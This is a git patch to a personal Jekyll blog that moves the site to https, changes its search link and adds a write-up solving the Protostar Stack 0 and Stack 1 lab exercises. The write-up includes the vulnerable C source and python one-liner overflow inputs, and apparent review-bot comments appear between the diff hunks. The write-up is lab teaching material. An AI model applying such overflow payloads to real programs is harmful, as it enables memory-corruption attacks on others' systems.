From cabe6e07945132516ababd27ea791000d831bc24 Mon Sep 17 00:00:00 2001 From: Paul Walko Date: Wed, 15 Jun 2016 01:06:03 -0400 Subject: [PATCH] new site4 --- _config.yml | 14 +-- _includes/head_base.html | 9 ++ _includes/header.html | 2 +- _posts/2016-06-14-nebula_exploit_exercises.md | 94 +++++++++++++++- _site/404.html | 11 +- _site/about/index.html | 11 +- _site/category/index.html | 13 ++- _site/index.html | 13 ++- _site/sitemap.xml | 4 +- _site/tag/index.html | 17 ++- _site/writeup/nebula_exploit_exercises.html | 105 +++++++++++++++++- _site/writeup/test_post.html | 11 +- 12 files changed, 275 insertions(+), 29 deletions(-) diff --git a/_config.yml b/_config.yml index 8e18538..a537b6f 100644 --- a/_config.yml +++ b/_config.yml @@ -10,7 +10,8 @@ excerpt_separator: "[-----]" # mode: dev mode: product -url: http://paul.walko.org/ +url: https://paul.walko.org/ +enforce_ssl: paul.walko.org/ devurl: http://localhost:4000/ name: Paul Walko title: Paul Walko @@ -27,13 +28,9 @@ my: address: country: United States skills: - security: ["Wireshark", "IDA", "Ollydebug"] + security: ["Wireshark", "IDA", "GDB"] coding: ["C", "C++", "Python", "Java", "bash", "HTML"] - tools: ["Linux"] - -collections: - qqGroupGuide: - output: true + tools: ["Linux", "vim", "Arch Linux"] defaults: - scope: @@ -41,8 +38,5 @@ defaults: type: "posts" values: excerpt: "{{ page.content }} | slice: 0 300" - - scope: - path: "" - type: "qqGroupGuide" values: layout: markdownreader_bare diff --git a/_includes/head_base.html b/_includes/head_base.html index 388d642..4a68520 100755 --- a/_includes/head_base.html +++ b/_includes/head_base.html @@ -1,4 +1,9 @@ + @@ -29,6 +34,10 @@ + + + + diff --git a/_includes/header.html b/_includes/header.html index a398912..b1cb2b6 100755 --- a/_includes/header.html +++ b/_includes/header.html 
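Review bot: Both `url: https://paul.walko.org/` and `enforce_ssl: paul.walko.org/` keep a trailing slash, and the generated `_site/sitemap.xml` in this same patch still emits `http://paul.walko.org//writeup/...` — a doubled slash and, more importantly, still the http scheme — so whatever consumes `site.url` has not picked up this change (either the output was built before the config edit or the template hard-codes the scheme; the sitemap hunk here only touches lastmod). Drop the trailing slashes, `url: https://paul.walko.org` and `enforce_ssl: paul.walko.org`, and rebuild so the committed `_site` output actually advertises https. If `enforce_ssl` is consumed by a client-side redirect in `head_base.html` (its added lines are not visible in this patch, so I cannot confirm), note that such a script only runs after the page was already fetched in plaintext; a server-side 301 to https plus an HSTS header is the control that prevents the insecure request in the first place.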
@@ -37,7 +37,7 @@ $('#dummySearch').submit(function(e) { e.preventDefault(); keyword = $('#search').val(); - url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword; + url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword; location.href = url; }) }) diff --git a/_posts/2016-06-14-nebula_exploit_exercises.md b/_posts/2016-06-14-nebula_exploit_exercises.md index d7818a1..ad76001 100644 --- a/_posts/2016-06-14-nebula_exploit_exercises.md +++ b/_posts/2016-06-14-nebula_exploit_exercises.md 
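Review bot: `keyword` is concatenated into the query string raw, so a `#`, `&`, `%` or `+` typed into the search box truncates or alters the query; since this line is already being edited, encode it: `url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + encodeURIComponent(keyword);`. Because the target is a fixed https origin assigned to `location.href`, this is a correctness issue rather than an open redirect, but it is a one-token fix. `keyword` and `url` are also assigned without `var`, which makes them implicit globals; `var keyword = $('#search').val();` and `var url = ...` keep them scoped to the handler. The submit handler appears to open on the hunk's context header line, so the enclosing function starts at the hunk boundary rather than inside it.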
@@ -1,7 +1,99 @@
 ---
-title: "Protostar Exploit Exercises Solutions 0-3"
+title: "Protostar Exploit Exercises Solutions 0-1"
 layout: post
 category: writeup
 tags: [exploit-exercises, protostar, hacking]
 excerpt: "Walkthrough for Protostar exercises on exploit-exercises.com"
 ---
+
+# Stack 0
+
+Here's what we're given:
+
+```
+#include
+#include
+#include
+
+int main(int argc, char **argv)
+{
+ volatile int modified;
+ char buffer[64];
+
+ modified = 0;
+ gets(buffer);
+
+ if(modified != 0) {
+ printf("you have changed the 'modified' variable\n");
+ } else {
+ printf("Try again?\n");
+ }
+}
+```
+
+
+
+The first thing I took note of is the size of the `buffer`: 64 bytes. After that, the program inputs text for `buffer`, and then checks to see if you modified the `modified` variable.
+I'm guessing if I put in a string longer than 64 bytes it will work. Let's see:
+
+```
+$ echo `python -c 'print "A"*64'` | ./stack0
+Try again?
+```
+
+That works as expected, now with 65 bytes:
+
+```
+$ echo `python -c 'print "A"*65'` | ./stack0
+you have changed the 'modified' variable
+```
+
+Solved!
+
+# Stack 1
+
+Here's the code we're given:
+
+```
+#include
+#include
+#include
+#include
+
+int main(int argc, char **argv)
+{
+ volatile int modified;
+ char buffer[64];
+
+ if(argc == 1) {
+ errx(1, "please specify an argument\n");
+ }
+
+ modified = 0;
+ strcpy(buffer, argv[1]);
+
+ if(modified == 0x61626364) {
+ printf("you have correctly got the variable to the right value\n");
+ } else {
+ printf("Try again, you got 0x%08x\n", modified);
+ }
+}
+```
+
+Just like Stack 0, we're given a `buffer` array size 64 bytes and we're also asked to input the contents of it. Except it looks like modified has to equal `0x61626364` instead of just changing it like before. 
+ +Keep in mind this is [little endian](https://en.wikipedia.org/wiki/Endianness), so I'll input the value in reverse order: + +``` +$ ./stack1 `python -c 'print "A"*64'` +Try again, you got 0x00000000 +``` + +That works as expected, now with the additional bytes: + +``` +$ ./stack1 `python -c 'print "A"*64 + "\x64\x63\x62\x61"'` +you have correctly got the variable to the right value +``` + +Woo! diff --git a/_site/404.html b/_site/404.html index 67fa96e..45c2839 100644 --- a/_site/404.html +++ b/_site/404.html @@ -5,6 +5,11 @@ + @@ -35,6 +40,10 @@ + + + + @@ -81,7 +90,7 @@ $('#dummySearch').submit(function(e) { e.preventDefault(); keyword = $('#search').val(); - url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword; + url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword; location.href = url; }) }) diff --git a/_site/about/index.html b/_site/about/index.html index 7b51473..e9d1dbb 100644 --- a/_site/about/index.html +++ b/_site/about/index.html @@ -5,6 +5,11 @@ + @@ -35,6 +40,10 @@ + + + + @@ -81,7 +90,7 @@ $('#dummySearch').submit(function(e) { e.preventDefault(); keyword = $('#search').val(); - url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword; + url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword; location.href = url; }) }) diff --git a/_site/category/index.html b/_site/category/index.html index 8f420c6..6c406ab 100644 --- a/_site/category/index.html +++ b/_site/category/index.html @@ -5,6 +5,11 @@ + @@ -35,6 +40,10 @@ + + + + @@ -81,7 +90,7 @@ $('#dummySearch').submit(function(e) { e.preventDefault(); keyword = $('#search').val(); - url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword; + url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword; location.href = url; }) }) @@ -139,7 +148,7 @@
-

Protostar Exploit Exercises Solutions 0-3

+

Protostar Exploit Exercises Solutions 0-1

  • exploit-exercises
  • diff --git a/_site/index.html b/_site/index.html index b4d75e5..4540ac1 100644 --- a/_site/index.html +++ b/_site/index.html @@ -5,6 +5,11 @@ + @@ -35,6 +40,10 @@ + + + + @@ -81,7 +90,7 @@ $('#dummySearch').submit(function(e) { e.preventDefault(); keyword = $('#search').val(); - url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword; + url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword; location.href = url; }) }) @@ -107,7 +116,7 @@
-

Protostar Exploit Exercises Solutions 0-3

+

Protostar Exploit Exercises Solutions 0-1

  • exploit-exercises
  • diff --git a/_site/sitemap.xml b/_site/sitemap.xml index 678044d..6c1a16b 100644 --- a/_site/sitemap.xml +++ b/_site/sitemap.xml @@ -6,13 +6,13 @@ http://paul.walko.org//writeup/nebula_exploit_exercises - 2016-06-15T00:02:53-04:00 + 2016-06-15T01:05:43-04:00 weekly http://paul.walko.org//writeup/test_post - 2016-06-15T00:02:53-04:00 + 2016-06-15T01:05:43-04:00 weekly diff --git a/_site/tag/index.html b/_site/tag/index.html index 0163fa2..ca5aa80 100644 --- a/_site/tag/index.html +++ b/_site/tag/index.html @@ -5,6 +5,11 @@ + @@ -35,6 +40,10 @@ + + + + @@ -81,7 +90,7 @@ $('#dummySearch').submit(function(e) { e.preventDefault(); keyword = $('#search').val(); - url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword; + url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword; location.href = url; }) }) @@ -167,7 +176,7 @@
-

Protostar Exploit Exercises Solutions 0-3

+

Protostar Exploit Exercises Solutions 0-1

  • exploit-exercises
  • diff --git a/_site/writeup/nebula_exploit_exercises.html b/_site/writeup/nebula_exploit_exercises.html index 53e27a2..6dcc691 100644 --- a/_site/writeup/nebula_exploit_exercises.html +++ b/_site/writeup/nebula_exploit_exercises.html @@ -5,11 +5,16 @@ + -Protostar Exploit Exercises Solutions 0-3 +Protostar Exploit Exercises Solutions 0-1 @@ -35,6 +40,10 @@ + + + + @@ -85,7 +94,7 @@ $('#dummySearch').submit(function(e) { e.preventDefault(); keyword = $('#search').val(); - url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword; + url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword; location.href = url; }) }) @@ -100,7 +109,7 @@
    -

    Protostar Exploit Exercises Solutions 0-3

    +

    Protostar Exploit Exercises Solutions 0-1

      @@ -116,7 +125,95 @@
    - +

    Stack 0

    + +

    Here’s what we’re given:

    + +
    #include <stdlib.h>
    +#include <unistd.h>
    +#include <stdio.h>
    +
    +int main(int argc, char **argv)
    +{
    +  volatile int modified;
    +  char buffer[64];
    +
    +  modified = 0;
    +  gets(buffer);
    +
    +  if(modified != 0) {
    +      printf("you have changed the 'modified' variable\n");
    +  } else {
    +      printf("Try again?\n");
    +  }
    +}
    +
    +
    + +

    The first thing I took note of is the size of the buffer: 64 bytes. After that, the program inputs text for buffer, and then checks to see if you modified the modified variable. +I’m guessing if I put in a string longer than 64 bytes it will work. Let’s see:

    + +
    $ echo `python -c 'print "A"*64'` | ./stack0
    +Try again?
    +
    +
    + +

    That works as expected, now with 65 bytes:

    + +
    $  echo `python -c 'print "A"*65'` | ./stack0      
    +you have changed the 'modified' variable
    +
    +
    + +

    Solved!

    + +

    Stack 1

    + +

    Here’s the code we’re given:

    + +
    #include <stdlib.h>
    +#include <unistd.h>
    +#include <stdio.h>
    +#include <string.h>
    +
    +int main(int argc, char **argv)
    +{
    +  volatile int modified;
    +  char buffer[64];
    +
    +  if(argc == 1) {
    +      errx(1, "please specify an argument\n");
    +  }
    +
    +  modified = 0;
    +  strcpy(buffer, argv[1]);
    +
    +  if(modified == 0x61626364) {
    +      printf("you have correctly got the variable to the right value\n");
    +  } else {
    +      printf("Try again, you got 0x%08x\n", modified);
    +  }
    +}
    +
    +
    + +

    Just like Stack 0, we’re given a buffer array size 64 bytes and we’re also asked to input the contents of it. Except it looks like modified has to equal 0x61626364 instead of just changing it like before.

    + +

    Keep in mind this is little endian, so I’ll input the value in reverse order:

    + +
    $ ./stack1 `python -c 'print "A"*64'`
    +Try again, you got 0x00000000
    +
    +
    + +

    That works as expected, now with the additional bytes:

    + +
    $ ./stack1 `python -c 'print "A"*64 + "\x64\x63\x62\x61"'`    
    +you have correctly got the variable to the right value
    +
    +
    + +

    Woo!

    diff --git a/_site/writeup/test_post.html b/_site/writeup/test_post.html index 377f449..b9821e4 100644 --- a/_site/writeup/test_post.html +++ b/_site/writeup/test_post.html @@ -5,6 +5,11 @@ + @@ -35,6 +40,10 @@ + + + + @@ -85,7 +94,7 @@ $('#dummySearch').submit(function(e) { e.preventDefault(); keyword = $('#search').val(); - url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword; + url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword; location.href = url; }) })